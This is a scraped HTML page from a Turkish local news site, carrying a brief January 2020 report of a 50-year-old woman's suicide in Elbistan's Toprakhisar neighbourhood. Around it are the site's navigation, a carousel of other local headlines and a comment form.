href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YaYam_Hastanesi_.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/ihtiyac-sahibi-ailelere-5-milyon-536-bin-tllik-yardim-eli-uzandi-h65461.html" title="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/01/Ysimsiz-1_66.jpg" alt="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı" class="pull-left" /> <div class="caption-line"><p>İhtiyaç sahibi ailelere 5 milyon...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/01/Ysimsiz-1_65.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" class="pull-left" /> <div class="caption-line"><p>PTT Spor’u 3-1 yenen filenin...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-soba-zehirlenmesi-can-aldi-h65459.html" title="Elbistan’da soba zehirlenmesi can aldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/01/Ysimsiz-1_64.jpg" alt="Elbistan’da soba zehirlenmesi can aldı" class="pull-left" /> <div class="caption-line"><p>Elbistan’da soba zehirlenmesi can aldı</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/girisim-grubu-uyeleri-baskan-paksoyu-ziyaret-etti-h65458.html" title="Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/01/Ysimsiz-1_63.jpg" alt="Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti" class="pull-left" /> <div class="caption-line"><p>Girişim Grubu Üyeleri Başkan Paksoy’u...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/linyit-komuru-nano-teknolojik-urunlere-donusuyor-h65453.html" title="Linyit kömürü, nano teknolojik ürünlere dönüşüyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/01/Ysimsiz-1_62.jpg" alt="Linyit kömürü, nano teknolojik ürünlere dönüşüyor" class="pull-left" /> <div class="caption-line"><p>Linyit kömürü, nano teknolojik ürünlere...</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Tavana astığı iple yaşamına son verdi</h1> <h2 class="lead" itemprop="description"><strong>Elbistan’a bağlı Toprakhisar Mahallesi’nde 50 yaşındaki kadın, tavana astığı iple yaşamına son verdi.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-01-21 10:54:15" content="2020-01-21T10:54:15+02:00">21 Ocak 2020 Salı 10:54</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/tavana_astigi_iple_yasamina_son_verdi_h65457_9bba9.jpg" alt="Tavana astığı iple yaşamına son verdi" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/tavana-astigi-iple-yasamina-son-verdi-h65457.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><a href="http://www.elbistanbalikdunyasi.com" target="_blank"><img src="https://www.elbistanolay.com/sites/84/uploads/2020/01/17/large/balikdunyasi.gif" alt="Balik Dunyasi Reklam" border="0"/></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Edinilen bilgi ve iddialara göre, 50 yaşındaki Zergah Sol isimli kadın, girdiği ruhi bunalım sonucunda evinin tavanına astığı iple yaşamına son verdi. Olay yerine çağrılan sağlık ekipleri, yaptıkları kontrolde Sol’un hayatını kaybettiğini belirledi.&#160; Sol’un cansız bedeni, olay yerinde yapılan savcılık ve jandarma olay yeri inceleme ekiplerinin yaptığı incelemenin ardından Malatya Adli Tıp Kurumu’nda yapılacak otopsi için Elbistan Devlet Hastanesi morguna kaldırıldı. </span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Olayla ilgili soruşturma başlatıldı.</span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;"><o:p>&#160;</o:p></span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><o:p></o:p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ihtiyac-sahibi-ailelere-5-milyon-536-bin-tllik-yardim-eli-uzandi-h65461.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanda-soba-zehirlenmesi-can-aldi-h65459.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ekinozunde-yariyil-tatili-genclik-ve-egitim-merkezi-acildi-h65463.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ehliyet-sinavi-icin-il-merkezine-gitme-devri-sona-eriyor-h65462.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/girisim-grubu-uyeleri-baskan-paksoyu-ziyaret-etti-h65458.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/linyit-komuru-nano-teknolojik-urunlere-donusuyor-h65453.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/tpao-kahramanmarasta-petrol-arayacak-h65452.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bekleme-alanlarindaki-koltuklara-kesilerek-zarar-veriliyor-h65451.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/13-kirsal-mahallede-yol-bakim-calismasi-tamamlandi-h65450.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-kahramanmarasa-geliyor-h65449.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanspor-ikinci-yarinin-ilk-macindan-yenik-ayrildi-h65448.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-kilic-muhtarlarin-sorunlarini-dinledi-h65447.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/balik-dunyasi-torenle-hizmete-acildi-h65446.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/unal-ve-oztunctan-elbistan-icin-birlik-ve-beraberlik-vurgusu-h65443.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/unal-elbistan-adliye-sarayini-ziyaret-etti-h65442.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/santrallerle-ilgili-brifing-alan-unal-karakuz-baraji-icin-mujde-verdi-h65441.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ciftcinin-3-ana-sorunu-icin-ankaraya-cikarma-yaptilar-h65440.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/oztunc-santral-filtre-takilmadan-calismayacak-h65439.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-kilictan-yariyil-tatili-mesaji-h65438.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gurbuz-voleybol-ve-futbol-takimlarina-belediye-butcesinden-kurus-aktarmadik-h65437.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gul-gundemi-degerlendirdi-algi-operasyonuna-dikkati-cekti-h65434.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanli-avukatin-otomobili-takla-atti-1-olu-3-yarali-h65426.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/34-bin-ogrenci-karne-sevincini-yasadi-h65432.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ekinozu-icmeleri-turizme-hazirlaniyor-h65436.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">PTT Spor’u 3-1 yenen filenin sultanları moral buldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ihtiyac-sahibi-ailelere-5-milyon-536-bin-tllik-yardim-eli-uzandi-h65461.html" title="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/ihtiyac_sahibi_ailelere_5_milyon_536_bin_tllik_yardim_eli_uzandi_h65461_1a5e1.jpg" alt="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-soba-zehirlenmesi-can-aldi-h65459.html" title="Elbistan’da soba zehirlenmesi can aldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/elbistanda_soba_zehirlenmesi_can_aldi_h65459_6e788.jpg" alt="Elbistan’da soba zehirlenmesi can aldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’da soba zehirlenmesi can aldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ekinozunde-yariyil-tatili-genclik-ve-egitim-merkezi-acildi-h65463.html" title="Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/ekinozunde_yariyil_tatili_genclik_ve_egitim_merkezi_acildi_h65463_c35ab.jpg" alt="Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ehliyet-sinavi-icin-il-merkezine-gitme-devri-sona-eriyor-h65462.html" title="Ehliyet sınavı için il merkezine gitme devri sona eriyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/ehliyet_sinavi_icin_il_merkezine_gitme_devri_sona_eriyor_h65462_90a68.jpg" alt="Ehliyet sınavı için il merkezine gitme devri sona eriyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ehliyet sınavı için il merkezine gitme devri sona eriyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/girisim-grubu-uyeleri-baskan-paksoyu-ziyaret-etti-h65458.html" title="Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/girisim_grubu_uyeleri_baskan_paksoyu_ziyaret_etti_h65458_a53df.jpg" alt="Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/linyit-komuru-nano-teknolojik-urunlere-donusuyor-h65453.html" title="Linyit kömürü, nano teknolojik ürünlere dönüşüyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/linyit_komuru_nano_teknolojik_urunlere_donusuyor_h65453_56d77.jpg" alt="Linyit kömürü, nano teknolojik ürünlere dönüşüyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Linyit kömürü, nano teknolojik ürünlere dönüşüyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/tpao-kahramanmarasta-petrol-arayacak-h65452.html" title="TPAO, Kahramanmaraş’ta petrol arayacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/tpao_kahramanmarasta_petrol_arayacak_h65452_56ffb.jpg" alt="TPAO, Kahramanmaraş’ta petrol arayacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">TPAO, Kahramanmaraş’ta petrol arayacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bekleme-alanlarindaki-koltuklara-kesilerek-zarar-veriliyor-h65451.html" title="Bekleme alanlarındaki koltuklara kesilerek zarar veriliyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/bekleme_alanlarindaki_koltuklara_kesilerek_zarar_veriliyor_h65451_39b95.jpg" alt="Bekleme alanlarındaki koltuklara kesilerek zarar veriliyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bekleme alanlarındaki koltuklara kesilerek zarar veriliyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/13-kirsal-mahallede-yol-bakim-calismasi-tamamlandi-h65450.html" title="13 kırsal mahallede yol bakım çalışması tamamlandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/13_kirsal_mahallede_yol_bakim_calismasi_tamamlandi_h65450_67c4f.jpg" alt="13 kırsal mahallede yol bakım çalışması tamamlandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">13 kırsal mahallede yol bakım çalışması tamamlandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-kahramanmarasa-geliyor-h65449.html" title="Cumhurbaşkanı Erdoğan, Kahramanmaraş’a geliyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/cumhurbaskani_erdogan_kahramanmarasa_geliyor_h65449_c85d8.jpg" alt="Cumhurbaşkanı Erdoğan, Kahramanmaraş’a geliyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Cumhurbaşkanı Erdoğan, Kahramanmaraş’a geliyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanspor-ikinci-yarinin-ilk-macindan-yenik-ayrildi-h65448.html" title="Elbistanspor, ikinci yarının ilk maçından yenik ayrıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/elbistanspor_ikinci_yarinin_ilk_macindan_yenik_ayrildi_h65448_b427b.jpg" alt="Elbistanspor, ikinci yarının ilk maçından yenik ayrıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanspor, ikinci yarının ilk maçından yenik ayrıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-kilic-muhtarlarin-sorunlarini-dinledi-h65447.html" title="Başkan Kılıç, muhtarların sorunlarını dinledi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/baskan_kilic_muhtarlarin_sorunlarini_dinledi_h65447_8316a.jpg" alt="Başkan Kılıç, muhtarların sorunlarını dinledi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Kılıç, muhtarların sorunlarını dinledi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/balik-dunyasi-torenle-hizmete-acildi-h65446.html" title="Balık Dünyası törenle hizmete açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/balik_dunyasi_torenle_hizmete_acildi_h65446_5f3e4.jpg" alt="Balık Dünyası törenle hizmete açıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Balık Dünyası törenle hizmete açıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/unal-ve-oztunctan-elbistan-icin-birlik-ve-beraberlik-vurgusu-h65443.html" title="Ünal ve Öztunç’tan Elbistan için birlik ve beraberlik vurgusu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/unal_ve_oztunctan_elbistan_icin_birlik_ve_beraberlik_vurgusu_h65443_1ac67.jpg" alt="Ünal ve Öztunç’tan Elbistan için birlik ve beraberlik vurgusu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ünal ve Öztunç’tan Elbistan için birlik ve beraberlik vurgusu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/unal-elbistan-adliye-sarayini-ziyaret-etti-h65442.html" title="Ünal, Elbistan Adliye Sarayını ziyaret etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/unal_elbistan_adliye_sarayini_ziyaret_etti_h65442_36f3a.jpg" alt="Ünal, Elbistan Adliye Sarayını ziyaret etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ünal, Elbistan Adliye Sarayını ziyaret etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/santrallerle-ilgili-brifing-alan-unal-karakuz-baraji-icin-mujde-verdi-h65441.html" title="Santrallerle ilgili brifing alan Ünal, Karakuz Barajı için müjde verdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/santrallerle_ilgili_brifing_alan_unal_karakuz_baraji_icin_mujde_verdi_h65441_2646a.jpg" alt="Santrallerle ilgili brifing alan Ünal, Karakuz Barajı için müjde verdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Santrallerle ilgili brifing alan Ünal, Karakuz Barajı için müjde verdi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ciftcinin-3-ana-sorunu-icin-ankaraya-cikarma-yaptilar-h65440.html" title="Çiftçinin 3 ana sorunu için Ankara’ya çıkarma yaptılar"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/ciftcinin_3_ana_sorunu_icin_ankaraya_cikarma_yaptilar_h65440_8d38c.jpg" alt="Çiftçinin 3 ana sorunu için Ankara’ya çıkarma yaptılar" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çiftçinin 3 ana sorunu için Ankara’ya çıkarma yaptılar</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/oztunc-santral-filtre-takilmadan-calismayacak-h65439.html" title="Öztunç: “Santral, filtre takılmadan çalışmayacak”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/oztunc_santral_filtre_takilmadan_calismayacak_h65439_e3ad4.jpg" alt="Öztunç: “Santral, filtre takılmadan çalışmayacak”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öztunç: “Santral, filtre takılmadan çalışmayacak”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-kilictan-yariyil-tatili-mesaji-h65438.html" title="Başkan Kılıç’tan yarıyıl tatili mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/baskan_kilictan_yariyil_tatili_mesaji_h65438_a3604.jpg" alt="Başkan Kılıç’tan yarıyıl tatili mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Kılıç’tan yarıyıl tatili mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gurbuz-voleybol-ve-futbol-takimlarina-belediye-butcesinden-kurus-aktarmadik-h65437.html" title="Gürbüz: “Voleybol ve futbol takımlarına belediye bütçesinden kuruş aktarmadık”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/gurbuz_voleybol_ve_futbol_takimlarina_belediye_butcesinden_kurus_aktarmadik_h65437_61275.jpg" alt="Gürbüz: “Voleybol ve futbol takımlarına belediye bütçesinden kuruş aktarmadık”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gürbüz: “Voleybol ve futbol takımlarına belediye bütçesinden kuruş aktarmadık”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gul-gundemi-degerlendirdi-algi-operasyonuna-dikkati-cekti-h65434.html" title="Başkan Gül gündemi değerlendirdi, algı operasyonuna dikkati çekti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/baskan_gul_gundemi_degerlendirdi_algi_operasyonuna_dikkati_cekti_h65434_5c26c.jpg" alt="Başkan Gül gündemi değerlendirdi, algı operasyonuna dikkati çekti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gül gündemi değerlendirdi, algı operasyonuna dikkati çekti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanli-avukatin-otomobili-takla-atti-1-olu-3-yarali-h65426.html" title="Elbistanlı avukatın otomobili takla attı: 1 ölü 3 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/elbistanli_avukatin_otomobili_takla_atti_1_olu_3_yarali_h65426_27a4c.jpg" alt="Elbistanlı avukatın otomobili takla attı: 1 ölü 3 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanlı avukatın otomobili takla attı: 1 ölü 3 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/34-bin-ogrenci-karne-sevincini-yasadi-h65432.html" title="34 bin öğrenci karne sevincini yaşadı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/34_bin_ogrenci_karne_sevincini_yasadi_h65432_a7267.jpg" alt="34 bin öğrenci karne sevincini yaşadı" /> <div class="carousel-caption"> <h2> <span style="font-size:">34 bin öğrenci karne sevincini yaşadı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ekinozu-icmeleri-turizme-hazirlaniyor-h65436.html" title="Ekinözü İçmeleri Turizme Hazırlanıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/01/ekinozu_icmeleri_turizme_hazirlaniyor_h65436_89566.jpg" alt="Ekinözü İçmeleri Turizme Hazırlanıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ekinözü İçmeleri Turizme Hazırlanıyor</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/tavana-astigi-iple-yasamina-son-verdi-h65457.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(65457);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="65457" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="9007a3e0b0a8261959ed755acc748d0f0c5b8aa4" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div 